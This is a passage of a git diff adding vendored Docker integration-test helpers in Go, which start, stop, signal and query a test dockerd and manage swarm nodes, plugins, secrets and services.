+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+)
+
+type testingT interface {
+	assert.TestingT
+	logT
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+const defaultDockerdBinary = "dockerd"
+
+var errDaemonNotStarted = errors.New("daemon not started")
+
+// SockRoot holds the path of the default docker integration daemon socket
+var SockRoot = filepath.Join(os.TempDir(), "docker-integration")
+
+type clientConfig struct {
+	transport *http.Transport
+	scheme    string
+	addr      string
+}
+
+// Daemon represents a Docker daemon for the testing framework
+type Daemon struct {
+	GlobalFlags       []string
+	Root              string
+	Folder            string
+	Wait              chan error
+	UseDefaultHost    bool
+	UseDefaultTLSHost bool
+
+	id            string
+	logFile       *os.File
+	cmd           *exec.Cmd
+	storageDriver string
+	userlandProxy bool
+	execRoot      string
+	experimental  bool
+	init          bool
+	dockerdBinary string
+	log           logT
+
+	// swarm related field
+	swarmListenAddr string
+	SwarmPort       int // FIXME(vdemeester) should probably not be exported
+
+	// cached information
+	CachedInfo types.Info
+}
+
+// New returns a Daemon instance to be used for testing.
+// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST.
+// The daemon will not automatically start.
+func New(t testingT, ops ...func(*Daemon)) *Daemon {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	dest := os.Getenv("DOCKER_INTEGRATION_DAEMON_DEST")
+	if dest == "" {
+		dest = os.Getenv("DEST")
+	}
+	assert.Check(t, dest != "", "Please set the DOCKER_INTEGRATION_DAEMON_DEST or the DEST environment variable")
+
+	storageDriver := os.Getenv("DOCKER_GRAPHDRIVER")
+
+	assert.NilError(t, os.MkdirAll(SockRoot, 0700), "could not create daemon socket root")
+
+	id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID()))
+	dir := filepath.Join(dest, id)
+	daemonFolder, err := filepath.Abs(dir)
+	assert.NilError(t, err, "Could not make %q an absolute path", dir)
+	daemonRoot := filepath.Join(daemonFolder, "root")
+
+	assert.NilError(t, os.MkdirAll(daemonRoot, 0755), "Could not create daemon root %q", dir)
+
+	userlandProxy := true
+	if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" {
+		if val, err := strconv.ParseBool(env); err != nil {
+			userlandProxy = val
+		}
+	}
+	d := &Daemon{
+		id:              id,
+		Folder:          daemonFolder,
+		Root:            daemonRoot,
+		storageDriver:   storageDriver,
+		userlandProxy:   userlandProxy,
+		execRoot:        filepath.Join(os.TempDir(), "docker-execroot", id),
+		dockerdBinary:   defaultDockerdBinary,
+		swarmListenAddr: defaultSwarmListenAddr,
+		SwarmPort:       DefaultSwarmPort,
+		log:             t,
+	}
+
+	for _, op := range ops {
+		op(d)
+	}
+
+	return d
+}
+
+// RootDir returns the root directory of the daemon.
+func (d *Daemon) RootDir() string {
+	return d.Root
+}
+
+// ID returns the generated id of the daemon
+func (d *Daemon) ID() string {
+	return d.id
+}
+
+// StorageDriver returns the configured storage driver of the daemon
+func (d *Daemon) StorageDriver() string {
+	return d.storageDriver
+}
+
+// Sock returns the socket path of the daemon
+func (d *Daemon) Sock() string {
+	return fmt.Sprintf("unix://" + d.sockPath())
+}
+
+func (d *Daemon) sockPath() string {
+	return filepath.Join(SockRoot, d.id+".sock")
+}
+
+// LogFileName returns the path the daemon's log file
+func (d *Daemon) LogFileName() string {
+	return d.logFile.Name()
+}
+
+// ReadLogFile returns the content of the daemon log file
+func (d *Daemon) ReadLogFile() ([]byte, error) {
+	return ioutil.ReadFile(d.logFile.Name())
+}
+
+// NewClient creates new client based on daemon's socket path
+// FIXME(vdemeester): replace NewClient with NewClientT
+func (d *Daemon) NewClient() (*client.Client, error) {
+	return client.NewClientWithOpts(
+		client.FromEnv,
+		client.WithHost(d.Sock()))
+}
+
+// NewClientT creates new client based on daemon's socket path
+// FIXME(vdemeester): replace NewClient with NewClientT
+func (d *Daemon) NewClientT(t assert.TestingT) *client.Client {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	c, err := client.NewClientWithOpts(
+		client.FromEnv,
+		client.WithHost(d.Sock()))
+	assert.NilError(t, err, "cannot create daemon client")
+	return c
+}
+
+// Cleanup cleans the daemon files : exec root (network namespaces, ...), swarmkit files
+func (d *Daemon) Cleanup(t testingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	// Cleanup swarmkit wal files if present
+	cleanupRaftDir(t, d.Root)
+	cleanupNetworkNamespace(t, d.execRoot)
+}
+
+// Start starts the daemon and return once it is ready to receive requests.
+func (d *Daemon) Start(t testingT, args ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	if err := d.StartWithError(args...); err != nil {
+		t.Fatalf("Error starting daemon with arguments: %v", args)
+	}
+}
+
+// StartWithError starts the daemon and return once it is ready to receive requests.
+// It returns an error in case it couldn't start.
+func (d *Daemon) StartWithError(args ...string) error {
+	logFile, err := os.OpenFile(filepath.Join(d.Folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600)
+	if err != nil {
+		return errors.Wrapf(err, "[%s] Could not create %s/docker.log", d.id, d.Folder)
+	}
+
+	return d.StartWithLogFile(logFile, args...)
+}
+
+// StartWithLogFile will start the daemon and attach its streams to a given file.
+func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error {
+	d.handleUserns()
+	dockerdBinary, err := exec.LookPath(d.dockerdBinary)
+	if err != nil {
+		return errors.Wrapf(err, "[%s] could not find docker binary in $PATH", d.id)
+	}
+	args := append(d.GlobalFlags,
+		"--containerd", "/var/run/docker/containerd/docker-containerd.sock",
+		"--data-root", d.Root,
+		"--exec-root", d.execRoot,
+		"--pidfile", fmt.Sprintf("%s/docker.pid", d.Folder),
+		fmt.Sprintf("--userland-proxy=%t", d.userlandProxy),
+	)
+	if d.experimental {
+		args = append(args, "--experimental")
+	}
+	if d.init {
+		args = append(args, "--init")
+	}
+	if !(d.UseDefaultHost || d.UseDefaultTLSHost) {
+		args = append(args, []string{"--host", d.Sock()}...)
+	}
+	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+		args = append(args, []string{"--userns-remap", root}...)
+	}
+
+	// If we don't explicitly set the log-level or debug flag(-D) then
+	// turn on debug mode
+	foundLog := false
+	foundSd := false
+	for _, a := range providedArgs {
+		if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") {
+			foundLog = true
+		}
+		if strings.Contains(a, "--storage-driver") {
+			foundSd = true
+		}
+	}
+	if !foundLog {
+		args = append(args, "--debug")
+	}
+	if d.storageDriver != "" && !foundSd {
+		args = append(args, "--storage-driver", d.storageDriver)
+	}
+
+	args = append(args, providedArgs...)
+	d.cmd = exec.Command(dockerdBinary, args...)
+	d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1")
+	d.cmd.Stdout = out
+	d.cmd.Stderr = out
+	d.logFile = out
+
+	if err := d.cmd.Start(); err != nil {
+		return errors.Errorf("[%s] could not start daemon container: %v", d.id, err)
+	}
+
+	wait := make(chan error)
+
+	go func() {
+		wait <- d.cmd.Wait()
+		d.log.Logf("[%s] exiting daemon", d.id)
+		close(wait)
+	}()
+
+	d.Wait = wait
+
+	tick := time.Tick(500 * time.Millisecond)
+	// make sure daemon is ready to receive requests
+	startTime := time.Now().Unix()
+	for {
+		d.log.Logf("[%s] waiting for daemon to start", d.id)
+		if time.Now().Unix()-startTime > 5 {
+			// After 5 seconds, give up
+			return errors.Errorf("[%s] Daemon exited and never started", d.id)
+		}
+		select {
+		case <-time.After(2 * time.Second):
+			return errors.Errorf("[%s] timeout: daemon does not respond", d.id)
+		case <-tick:
+			clientConfig, err := d.getClientConfig()
+			if err != nil {
+				return err
+			}
+
+			client := &http.Client{
+				Transport: clientConfig.transport,
+			}
+
+			req, err := http.NewRequest("GET", "/_ping", nil)
+			if err != nil {
+				return errors.Wrapf(err, "[%s] could not create new request", d.id)
+			}
+			req.URL.Host = clientConfig.addr
+			req.URL.Scheme = clientConfig.scheme
+			resp, err := client.Do(req)
+			if err != nil {
+				continue
+			}
+			resp.Body.Close()
+			if resp.StatusCode != http.StatusOK {
+				d.log.Logf("[%s] received status != 200 OK: %s\n", d.id, resp.Status)
+			}
+			d.log.Logf("[%s] daemon started\n", d.id)
+			d.Root, err = d.queryRootDir()
+			if err != nil {
+				return errors.Errorf("[%s] error querying daemon for root directory: %v", d.id, err)
+			}
+			return nil
+		case <-d.Wait:
+			return errors.Errorf("[%s] Daemon exited during startup", d.id)
+		}
+	}
+}
+
+// StartWithBusybox will first start the daemon with Daemon.Start()
+// then save the busybox image from the main daemon and load it into this Daemon instance.
+func (d *Daemon) StartWithBusybox(t testingT, arg ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	d.Start(t, arg...)
+	d.LoadBusybox(t)
+}
+
+// Kill will send a SIGKILL to the daemon
+func (d *Daemon) Kill() error {
+	if d.cmd == nil || d.Wait == nil {
+		return errDaemonNotStarted
+	}
+
+	defer func() {
+		d.logFile.Close()
+		d.cmd = nil
+	}()
+
+	if err := d.cmd.Process.Kill(); err != nil {
+		return err
+	}
+
+	return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
+}
+
+// Pid returns the pid of the daemon
+func (d *Daemon) Pid() int {
+	return d.cmd.Process.Pid
+}
+
+// Interrupt stops the daemon by sending it an Interrupt signal
+func (d *Daemon) Interrupt() error {
+	return d.Signal(os.Interrupt)
+}
+
+// Signal sends the specified signal to the daemon if running
+func (d *Daemon) Signal(signal os.Signal) error {
+	if d.cmd == nil || d.Wait == nil {
+		return errDaemonNotStarted
+	}
+	return d.cmd.Process.Signal(signal)
+}
+
+// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its
+// stack to its log file and exit
+// This is used primarily for gathering debug information on test timeout
+func (d *Daemon) DumpStackAndQuit() {
+	if d.cmd == nil || d.cmd.Process == nil {
+		return
+	}
+	SignalDaemonDump(d.cmd.Process.Pid)
+}
+
+// Stop will send a SIGINT every second and wait for the daemon to stop.
+// If it times out, a SIGKILL is sent.
+// Stop will not delete the daemon directory. If a purged daemon is needed,
+// instantiate a new one with NewDaemon.
+// If an error occurs while starting the daemon, the test will fail.
+func (d *Daemon) Stop(t testingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	err := d.StopWithError()
+	if err != nil {
+		if err != errDaemonNotStarted {
+			t.Fatalf("Error while stopping the daemon %s : %v", d.id, err)
+		} else {
+			t.Logf("Daemon %s is not started", d.id)
+		}
+	}
+}
+
+// StopWithError will send a SIGINT every second and wait for the daemon to stop.
+// If it timeouts, a SIGKILL is sent.
+// Stop will not delete the daemon directory. If a purged daemon is needed,
+// instantiate a new one with NewDaemon.
+func (d *Daemon) StopWithError() error {
+	if d.cmd == nil || d.Wait == nil {
+		return errDaemonNotStarted
+	}
+
+	defer func() {
+		d.logFile.Close()
+		d.cmd = nil
+	}()
+
+	i := 1
+	tick := time.Tick(time.Second)
+
+	if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
+		if strings.Contains(err.Error(), "os: process already finished") {
+			return errDaemonNotStarted
+		}
+		return errors.Errorf("could not send signal: %v", err)
+	}
+out1:
+	for {
+		select {
+		case err := <-d.Wait:
+			return err
+		case <-time.After(20 * time.Second):
+			// time for stopping jobs and run onShutdown hooks
+			d.log.Logf("[%s] daemon started", d.id)
+			break out1
+		}
+	}
+
+out2:
+	for {
+		select {
+		case err := <-d.Wait:
+			return err
+		case <-tick:
+			i++
+			if i > 5 {
+				d.log.Logf("tried to interrupt daemon for %d times, now try to kill it", i)
+				break out2
+			}
+			d.log.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid)
+			if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
+				return errors.Errorf("could not send signal: %v", err)
+			}
+		}
+	}
+
+	if err := d.cmd.Process.Kill(); err != nil {
+		d.log.Logf("Could not kill daemon: %v", err)
+		return err
+	}
+
+	d.cmd.Wait()
+
+	return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
+}
+
+// Restart will restart the daemon by first stopping it and the starting it.
+// If an error occurs while starting the daemon, the test will fail.
+func (d *Daemon) Restart(t testingT, args ...string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	d.Stop(t)
+	d.Start(t, args...)
+}
+
+// RestartWithError will restart the daemon by first stopping it and then starting it.
+func (d *Daemon) RestartWithError(arg ...string) error {
+	if err := d.StopWithError(); err != nil {
+		return err
+	}
+	return d.StartWithError(arg...)
+}
+
+func (d *Daemon) handleUserns() {
+	// in the case of tests running a user namespace-enabled daemon, we have resolved
+	// d.Root to be the actual final path of the graph dir after the "uid.gid" of
+	// remapped root is added--we need to subtract it from the path before calling
+	// start or else we will continue making subdirectories rather than truly restarting
+	// with the same location/root:
+	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+		d.Root = filepath.Dir(d.Root)
+	}
+}
+
+// ReloadConfig asks the daemon to reload its configuration
+func (d *Daemon) ReloadConfig() error {
+	if d.cmd == nil || d.cmd.Process == nil {
+		return errors.New("daemon is not running")
+	}
+
+	errCh := make(chan error)
+	started := make(chan struct{})
+	go func() {
+		_, body, err := request.Get("/events", request.Host(d.Sock()))
+		close(started)
+		if err != nil {
+			errCh <- err
+		}
+		defer body.Close()
+		dec := json.NewDecoder(body)
+		for {
+			var e events.Message
+			if err := dec.Decode(&e); err != nil {
+				errCh <- err
+				return
+			}
+			if e.Type != events.DaemonEventType {
+				continue
+			}
+			if e.Action != "reload" {
+				continue
+			}
+			close(errCh) // notify that we are done
+			return
+		}
+	}()
+
+	<-started
+	if err := signalDaemonReload(d.cmd.Process.Pid); err != nil {
+		return errors.Errorf("error signaling daemon reload: %v", err)
+	}
+	select {
+	case err := <-errCh:
+		if err != nil {
+			return errors.Errorf("error waiting for daemon reload event: %v", err)
+		}
+	case <-time.After(30 * time.Second):
+		return errors.New("timeout waiting for daemon reload event")
+	}
+	return nil
+}
+
+// LoadBusybox image into the daemon
+func (d *Daemon) LoadBusybox(t assert.TestingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	clientHost, err := client.NewEnvClient()
+	assert.NilError(t, err, "failed to create client")
+	defer clientHost.Close()
+
+	ctx := context.Background()
+	reader, err := clientHost.ImageSave(ctx, []string{"busybox:latest"})
+	assert.NilError(t, err, "failed to download busybox")
+	defer reader.Close()
+
+	client, err := d.NewClient()
+	assert.NilError(t, err, "failed to create client")
+	defer client.Close()
+
+	resp, err := client.ImageLoad(ctx, reader, true)
+	assert.NilError(t, err, "failed to load busybox")
+	defer resp.Body.Close()
+}
+
+func (d *Daemon) getClientConfig() (*clientConfig, error) {
+	var (
+		transport *http.Transport
+		scheme    string
+		addr      string
+		proto     string
+	)
+	if d.UseDefaultTLSHost {
+		option := &tlsconfig.Options{
+			CAFile:   "fixtures/https/ca.pem",
+			CertFile: "fixtures/https/client-cert.pem",
+			KeyFile:  "fixtures/https/client-key.pem",
+		}
+		tlsConfig, err := tlsconfig.Client(*option)
+		if err != nil {
+			return nil, err
+		}
+		transport = &http.Transport{
+			TLSClientConfig: tlsConfig,
+		}
+		addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort)
+		scheme = "https"
+		proto = "tcp"
+	} else if d.UseDefaultHost {
+		addr = opts.DefaultUnixSocket
+		proto = "unix"
+		scheme = "http"
+		transport = &http.Transport{}
+	} else {
+		addr = d.sockPath()
+		proto = "unix"
+		scheme = "http"
+		transport = &http.Transport{}
+	}
+
+	if err := sockets.ConfigureTransport(transport, proto, addr); err != nil {
+		return nil, err
+	}
+	transport.DisableKeepAlives = true
+
+	return &clientConfig{
+		transport: transport,
+		scheme:    scheme,
+		addr:      addr,
+	}, nil
+}
+
+func (d *Daemon) queryRootDir() (string, error) {
+	// update daemon root by asking /info endpoint (to support user
+	// namespaced daemon with root remapped uid.gid directory)
+	clientConfig, err := d.getClientConfig()
+	if err != nil {
+		return "", err
+	}
+
+	client := &http.Client{
+		Transport: clientConfig.transport,
+	}
+
+	req, err := http.NewRequest("GET", "/info", nil)
+	if err != nil {
+		return "", err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.URL.Host = clientConfig.addr
+	req.URL.Scheme = clientConfig.scheme
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return "", err
+	}
+	body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
+		return resp.Body.Close()
+	})
+
+	type Info struct {
+		DockerRootDir string
+	}
+	var b []byte
+	var i Info
+	b, err = request.ReadBody(body)
+	if err == nil && resp.StatusCode == http.StatusOK {
+		// read the docker root dir
+		if err = json.Unmarshal(b, &i); err == nil {
+			return i.DockerRootDir, nil
+		}
+	}
+	return "", err
+}
+
+// Info returns the info struct for this daemon
+func (d *Daemon) Info(t assert.TestingT) types.Info {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	apiclient, err := d.NewClient()
+	assert.NilError(t, err)
+	info, err := apiclient.Info(context.Background())
+	assert.NilError(t, err)
+	return info
+}
+
+func cleanupRaftDir(t testingT, rootPath string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	walDir := filepath.Join(rootPath, "swarm/raft/wal")
+	if err := os.RemoveAll(walDir); err != nil {
+		t.Logf("error removing %v: %v", walDir, err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go
new file mode 100644
index 0000000000..9dd9e36f0c
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go
@@ -0,0 +1,39 @@
+// +build !windows
+
+package daemon // import "github.com/docker/docker/internal/test/daemon"
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/internal/test"
+	"golang.org/x/sys/unix"
+)
+
+func cleanupNetworkNamespace(t testingT, execRoot string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	// Cleanup network namespaces in the exec root of this
+	// daemon because this exec root is specific to this
+	// daemon instance and has no chance of getting
+	// cleaned up when a new daemon is instantiated with a
+	// new exec root.
+	netnsPath := filepath.Join(execRoot, "netns")
+	filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error {
+		if err := unix.Unmount(path, unix.MNT_FORCE); err != nil {
+			t.Logf("unmount of %s failed: %v", path, err)
+		}
+		os.Remove(path)
+		return nil
+	})
+}
+
+// SignalDaemonDump sends a signal to the daemon to write a dump file
+func SignalDaemonDump(pid int) {
+	unix.Kill(pid, unix.SIGQUIT)
+}
+
+func signalDaemonReload(pid int) error {
+	return unix.Kill(pid, unix.SIGHUP)
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go
new file mode 100644
index 0000000000..cb6bb6a4cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go
@@ -0,0 +1,25 @@
+package daemon // import "github.com/docker/docker/internal/test/daemon"
+
+import (
+	"fmt"
+	"strconv"
+
+	"golang.org/x/sys/windows"
+)
+
+// SignalDaemonDump sends a signal to the daemon to write a dump file
+func SignalDaemonDump(pid int) {
+	ev, _ := windows.UTF16PtrFromString("Global\\docker-daemon-" + strconv.Itoa(pid))
+	h2, err := windows.OpenEvent(0x0002, false, ev)
+	if h2 == 0 || err != nil {
+		return
+	}
+	windows.PulseEvent(h2)
+}
+
+func signalDaemonReload(pid int) error {
+	return fmt.Errorf("daemon reload not supported")
+}
+
+func cleanupNetworkNamespace(t testingT, execRoot string) {
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/node.go b/vendor/github.com/docker/docker/internal/test/daemon/node.go
new file mode 100644
index 0000000000..d9263a7f29
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/node.go
@@ -0,0 +1,82 @@
+package daemon
+
+import (
+	"context"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+// NodeConstructor defines a swarm node constructor
+type NodeConstructor func(*swarm.Node)
+
+// GetNode returns a swarm node identified by the specified id
+func (d *Daemon) GetNode(t assert.TestingT, id string) *swarm.Node {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	node, _, err := cli.NodeInspectWithRaw(context.Background(), id)
+	assert.NilError(t, err)
+	assert.Check(t, node.ID == id)
+	return &node
+}
+
+// RemoveNode removes the specified node
+func (d *Daemon) RemoveNode(t assert.TestingT, id string, force bool) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	options := types.NodeRemoveOptions{
+		Force: force,
+	}
+	err := cli.NodeRemove(context.Background(), id, options)
+	assert.NilError(t, err)
+}
+
+// UpdateNode updates a swarm node with the specified node constructor
+func (d *Daemon) UpdateNode(t assert.TestingT, id string, f ...NodeConstructor) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	for i := 0; ; i++ {
+		node := d.GetNode(t, id)
+		for _, fn := range f {
+			fn(node)
+		}
+
+		err := cli.NodeUpdate(context.Background(), node.ID, node.Version, node.Spec)
+		if i < 10 && err != nil && strings.Contains(err.Error(), "update out of sequence") {
+			time.Sleep(100 * time.Millisecond)
+			continue
+		}
+		assert.NilError(t, err)
+		return
+	}
+}
+
+// ListNodes returns the list of the current swarm nodes
+func (d *Daemon) ListNodes(t assert.TestingT) []swarm.Node {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	nodes, err := cli.NodeList(context.Background(), types.NodeListOptions{})
+	assert.NilError(t, err)
+
+	return nodes
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/ops.go b/vendor/github.com/docker/docker/internal/test/daemon/ops.go
new file mode 100644
index 0000000000..34db073b57
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/ops.go
@@ -0,0 +1,44 @@
+package daemon
+
+import "github.com/docker/docker/internal/test/environment"
+
+// WithExperimental sets the daemon in experimental mode
+func WithExperimental(d *Daemon) {
+	d.experimental = true
+	d.init = true
+}
+
+// WithInit sets the daemon init
+func WithInit(d *Daemon) {
+	d.init = true
+}
+
+// WithDockerdBinary sets the dockerd binary to the specified one
+func WithDockerdBinary(dockerdBinary string) func(*Daemon) {
+	return func(d *Daemon) {
+		d.dockerdBinary = dockerdBinary
+	}
+}
+
+// WithSwarmPort sets the swarm port to use for swarm mode
+func WithSwarmPort(port int) func(*Daemon) {
+	return func(d *Daemon) {
+		d.SwarmPort = port
+	}
+}
+
+// WithSwarmListenAddr sets the swarm listen addr to use for swarm mode
+func WithSwarmListenAddr(listenAddr string) func(*Daemon) {
+	return func(d *Daemon) {
+		d.swarmListenAddr = listenAddr
+	}
+}
+
+// WithEnvironment sets options from internal/test/environment.Execution struct
+func WithEnvironment(e environment.Execution) func(*Daemon) {
+	return func(d *Daemon) {
+		if e.DaemonInfo.ExperimentalBuild {
+			d.experimental = true
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/plugin.go b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go
new file mode 100644
index 0000000000..63bbeed219
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go
@@ -0,0 +1,77 @@
+package daemon
+
+import (
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"gotest.tools/poll"
+)
+
+// PluginIsRunning provides a poller to check if the specified plugin is running
+func (d *Daemon) PluginIsRunning(name string) func(poll.LogT) poll.Result {
+	return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result {
+		if plugin.Enabled {
+			return poll.Success()
+		}
+		return poll.Continue("plugin %q is not enabled", name)
+	}))
+}
+
+// PluginIsNotRunning provides a poller to check if the specified plugin is not running
+func (d *Daemon) PluginIsNotRunning(name string) func(poll.LogT) poll.Result {
+	return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result {
+		if !plugin.Enabled {
+			return poll.Success()
+		}
+		return poll.Continue("plugin %q is enabled", name)
+	}))
+}
+
+// PluginIsNotPresent provides a poller to check if the specified plugin is not present
+func (d *Daemon) PluginIsNotPresent(name string) func(poll.LogT) poll.Result {
+	return withClient(d, func(c client.APIClient, t poll.LogT) poll.Result {
+		_, _, err := c.PluginInspectWithRaw(context.Background(), name)
+		if client.IsErrNotFound(err) {
+			return poll.Success()
+		}
+		if err != nil {
+			return poll.Error(err)
+		}
+		return poll.Continue("plugin %q exists", name)
+	})
+}
+
+// PluginReferenceIs provides a poller to check if the specified plugin has the specified reference
+func (d *Daemon) PluginReferenceIs(name, expectedRef string) func(poll.LogT) poll.Result {
+	return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result {
+		if plugin.PluginReference == expectedRef {
+			return poll.Success()
+		}
+		return poll.Continue("plugin %q reference is not %q", name, expectedRef)
+	}))
+}
+
+func withPluginInspect(name string, f func(*types.Plugin, poll.LogT) poll.Result) func(client.APIClient, poll.LogT) poll.Result {
+	return func(c client.APIClient, t poll.LogT) poll.Result {
+		plugin, _, err := c.PluginInspectWithRaw(context.Background(), name)
+		if client.IsErrNotFound(err) {
+			return poll.Continue("plugin %q not found", name)
+		}
+		if err != nil {
+			return poll.Error(err)
+		}
+		return f(plugin, t)
+	}
+
+}
+
+func withClient(d *Daemon, f func(client.APIClient, poll.LogT) poll.Result) func(poll.LogT) poll.Result {
+	return func(t poll.LogT) poll.Result {
+		c, err := d.NewClient()
+		if err != nil {
+			poll.Error(err)
+		}
+		return f(c, t)
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/secret.go b/vendor/github.com/docker/docker/internal/test/daemon/secret.go
new file mode 100644
index 0000000000..f3db7a4260
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/secret.go
@@ -0,0 +1,84 @@
+package daemon
+
+import (
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+// SecretConstructor defines a swarm secret constructor
+type SecretConstructor func(*swarm.Secret)
+
+// CreateSecret creates a secret given the specified spec
+func (d *Daemon) CreateSecret(t assert.TestingT, secretSpec swarm.SecretSpec) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	scr, err := cli.SecretCreate(context.Background(), secretSpec)
+	assert.NilError(t, err)
+
+	return scr.ID
+}
+
+// ListSecrets returns the list of the current swarm secrets
+func (d *Daemon) ListSecrets(t assert.TestingT) []swarm.Secret {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	secrets, err := cli.SecretList(context.Background(), types.SecretListOptions{})
+	assert.NilError(t, err)
+	return secrets
+}
+
+// GetSecret returns a swarm secret identified by the specified id
+func (d *Daemon) GetSecret(t assert.TestingT, id string) *swarm.Secret {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	secret, _, err := cli.SecretInspectWithRaw(context.Background(), id)
+	assert.NilError(t, err)
+	return &secret
+}
+
+// DeleteSecret removes the swarm secret identified by the specified id
+func (d *Daemon) DeleteSecret(t assert.TestingT, id string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	err := cli.SecretRemove(context.Background(), id)
+	assert.NilError(t, err)
+}
+
+// UpdateSecret updates the swarm secret identified by the specified id
+// Currently, only label update is supported.
+func (d *Daemon) UpdateSecret(t assert.TestingT, id string, f ...SecretConstructor) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	secret := d.GetSecret(t, id)
+	for _, fn := range f {
+		fn(secret)
+	}
+
+	err := cli.SecretUpdate(context.Background(), secret.ID, secret.Version, secret.Spec)
+
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/service.go b/vendor/github.com/docker/docker/internal/test/daemon/service.go
new file mode 100644
index 0000000000..0f88ca786b
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/service.go
@@ -0,0 +1,131 @@
+package daemon
+
+import (
+	"context"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+// ServiceConstructor defines a swarm service constructor function
+type ServiceConstructor func(*swarm.Service)
+
+func (d *Daemon) createServiceWithOptions(t assert.TestingT, opts types.ServiceCreateOptions, f ...ServiceConstructor) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	var service swarm.Service
+	for _, fn := range f {
+		fn(&service)
+	}
+
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
